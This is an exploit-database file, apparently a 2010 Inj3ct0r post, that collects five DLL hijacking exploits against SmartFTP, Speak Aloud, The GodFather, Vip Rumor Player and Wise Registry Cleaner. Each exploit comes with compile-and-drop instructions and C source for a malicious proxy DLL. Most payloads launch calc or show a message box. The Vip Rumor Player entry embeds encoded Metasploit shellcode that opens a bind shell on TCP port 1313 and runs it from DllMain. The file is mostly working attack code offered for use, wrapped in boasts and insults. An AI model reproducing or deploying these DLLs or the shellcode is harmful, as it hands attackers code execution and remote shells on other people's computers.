multisoft-dllhijack.txt
Posted on 27 October 2010
=================================================== SmartFTP 4.0.1142.0 DLL Hijacking Exploit =================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #SmartFTP 4.0.1142.0 DLL Hijacking Exploit (dwmapi.dll ; propsys.dll ) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends #Software: http://www.smartftp.com #Version : 4.0.11402.0 #Tested on: Windows XP sp3 # Home : www.Dev-PoinT.com : http://inj3ct0r.com ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids ------------------------------ [+] Compile code as dwmapi.dll ; propsys.dll [+] Move DLL file to the directory where SmartFTP 4.0.1142.0 is installed [+] check the result --> Your System 0wn3d BY anT!-Tr0J4n ===================== #dwmapi.dll (code) */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } =-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-= #propsys.dll (code) */ #include "stdafx.h" void init() { MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "Dev-PoinT",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } =================================================== Speak Aloud DLL Hijacking Exploit (dwmapi.dll) =================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #Speak Aloud DLL Hijacking Exploit (dwmapi.dll) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Software : http://www.guangmingsoft.net/speakaloud/help.htm #Tested on: Windows XP sp3 ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids ------------------------------ [+] Compile code as dwmapi.dll [+] Move DLL file to the directory where Speak Aloud Editor is installed [+] check the result --> 0wn33d ========================== # dwmapi.dll(code) */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; } =================================================== The GodFather v 0.80 DLL Hijacking Exploit =================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #The GodFather v 0.80 DLL Hijacking Exploit( fwpuclnt.dll ; wnaspi32.dll ) #Author : anT!-Tr0J4n #Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends #special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Software : http://www.jtclipper.eu/ #Version : 1.5.7 #Tested on: Windows XP/Vista/Windows 7 ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids ------------------------------ [>>] Compile code as fwpuclnt.dll ; wnaspi32.dll [>>] Move DLL file to the directory where The GodFather is installed [>>] check the result =--> [ Your System 0wn3d BY anT!-Tr0J4n ] =-=-=-=-=-=-=-=-==-=-==-=-=-=-=-= [ + ] fwpuclnt.dll [ + ] wnaspi32.dll (code) */ #include "stdafx.h" void init() { MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } =================================================== Vip Rumor Player 3.7 DLL Hijacking Exploit =================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #Vip Rumor Player 3.7 DLL Hijacking Exploit (mfc71enu.dll ; mfc71loc.dll ) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Product Version : 3.7 #Vendor : http://www.viprumor.com #Tested on: Windows XP sp3 ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids ------------------------------ [>>] Compile code as mfc71enu.dll ; mfc71loc.dll [>>] Move DLL file to the directory where Vip Rumor Player is installed [>>] check the result --> 0wn33d [>>]exploit.acc [>>]exploit.aif [>>]exploit.aiff [>>]exploit.ape [>>]exploit.flac [>>]exploit.m4a [>>]exploit.m4b [>>]exploit.mp3 [>>]exploit.mpc [>>]exploit.ogg [>>]exploit.wav ========================== */ #include <windows.h> #define DllExport __declspec (dllexport) /* * windows/shell_bind_tcp - 476 bytes * http://www.metasploit.com * Encoder: x86/shikata_ga_nai * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=, * AutoRunScript= */ unsigned char buf[] = "x33xc9xb1x71xd9xccxd9x74x24xf4x5axb8x8bxf0x6b" "x88x31x42x14x03x42x14x83xeax77x12x9ex51x4bx0a" "x15x46xa7x13x2exc4x17x2dx90xfax5ex1cx44xccx17" "x46x1axc1x2bx7bx6bx0bxc9xcbx79xf3x02x70xa7x1c" "x1ax18x5exeax0ex4cx26x6dx61x78x82x18x2ex5cxb0" "x47x78xb2xc4x13xa2x2bxfax10xe4x75x67xb5x3cx0f" "xd8xbcxefxaexddxf7x7cx02x82xd9x94x69xf6x52x08" "xc3xddx4dx9fx38x1fx4cx58x59x99x20xcex33x2bxe6" "x9ex58x2ax15x3axe7xacx30x0fxd9x19xf0xbcx96xe1" "xc5xdcxfcxe7x42x6ex35x16x4axf8x16x82x92x75xcd" "x72xb0x29x9exe4xadxa0x37x18x21xf9x5ax28xcaxc7" "x9exa3x1dxd5xe7xbexcexb6x58x9ax29xdcx1axbax13" "x72x13x09x87x4cx1cxf4x9ax33x30x57x38x59x4fx63" "x4ax8fxdfx2bxc7x3bx4ax2dx22x97x08x8dxf0x36x57" "x04x14x71x65x45x49xf3x0cx20xaex9dxefxc1xecxe7" "xcbx29x4fx12x65x23x10xb5xbcx8dxa0xafxc8x72x85" "x6cx72x2exe8x22x8fx3bx16x40x86x68x80x7dxafxf4" "xd1xcdxf6x7exd5x29x45xdbx05x92x29xc8xe2xb4x13" "xfbxebx3bx9ex9cxfex62xacx9dxa1x5cx9bx40x3fx12" "xc6x92xf6x5cx16xdbx64x62xcdx20x58x5fx69x71x80" "x11xa4xdex36xf3x73x53x86x07xbax93x68x03x99xaf" "xf7xd5x91x1fxcbxc3x0ex66x94xdcx5ax69x57xe3x76" "x21x98x42x03x51x0ex59x36x6fx8dxcax74xfax6ex45" "x1dx97x67x4bx6fxc2xa6xebxe2x6dxc0x1axe7xaex0b" "x40xc5xbex68x96xbbx8exe3x0fx6exb4x4ex25x14xe0" "xd0xa4x5ex63xeaxb6xecx72x47xbbxf2x2dx24xcexa1" "x5dx4fx3bx15xf7x43x09x8dx49x29xa6x4exf2x38xcc" "x9cx3fx40x37x0dx9dxe6x85x77xb4x01xf8x66x3fx0a" "x04x88x79x50xebx51xa7xf6x13x98x88xe5x92x8bx5d" "xc4x69x69xdbx3ax19x03xf8xf5xdex75x17x75x1dxd3" "x80x55xd3x72xcbxd5x04x7cx2dxbdxddx09xeex44x57" "x5ax72x31xacxfbx9bxf9x5fx59xb0xfd"; BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { int (*func)(); func = (int (*)()) buf; (int)(*func)(); return 0; } =================================================== Wise Registry Cleaner DLL Hijacking Exploit (dwmapi.dll) =================================================== || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_, ( : / (_) / ( . -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################### 1 0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 /* #Wise Registry Cleaner DLL Hijacking Exploit (dwmapi.dll) #Author : anT!-Tr0J4n #Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil #special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member #Home : www.Dev-PoinT.com $ http://inj3ct0r.com #Software : http://free-registry-cleaner.wisecleaner.com #Tested on: Windows XP sp3 [+] Wise Registry Cleaner speeds up your PC by cleaning your Registry ------------------------------ Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids ------------------------------ [+] Compile code as dwmapi.dll [+] Move DLL file to the directory where Wise Registry Cleaner Editor is installed [+] check the result --> 0wn33d ========================== # dwmapi.dll(code) */ #include <windows.h> #define DLLIMPORT __declspec (dllexport) DLLIMPORT void DwmDefWindowProc() { evil(); } DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); } DLLIMPORT void DwmEnableComposition() { evil(); } DLLIMPORT void DwmEnableMMCSS() { evil(); } DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); } DLLIMPORT void DwmGetColorizationColor() { evil(); } DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); } DLLIMPORT void DwmGetWindowAttribute() { evil(); } DLLIMPORT void DwmIsCompositionEnabled() { evil(); } DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); } DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); } DLLIMPORT void DwmRegisterThumbnail() { evil(); } DLLIMPORT void DwmSetDxFrameDuration() { evil(); } DLLIMPORT void DwmSetPresentParameters() { evil(); } DLLIMPORT void DwmSetWindowAttribute() { evil(); } DLLIMPORT void DwmUnregisterThumbnail() { evil(); } DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); } int evil() { WinExec("calc", 0); exit(0); return 0; }
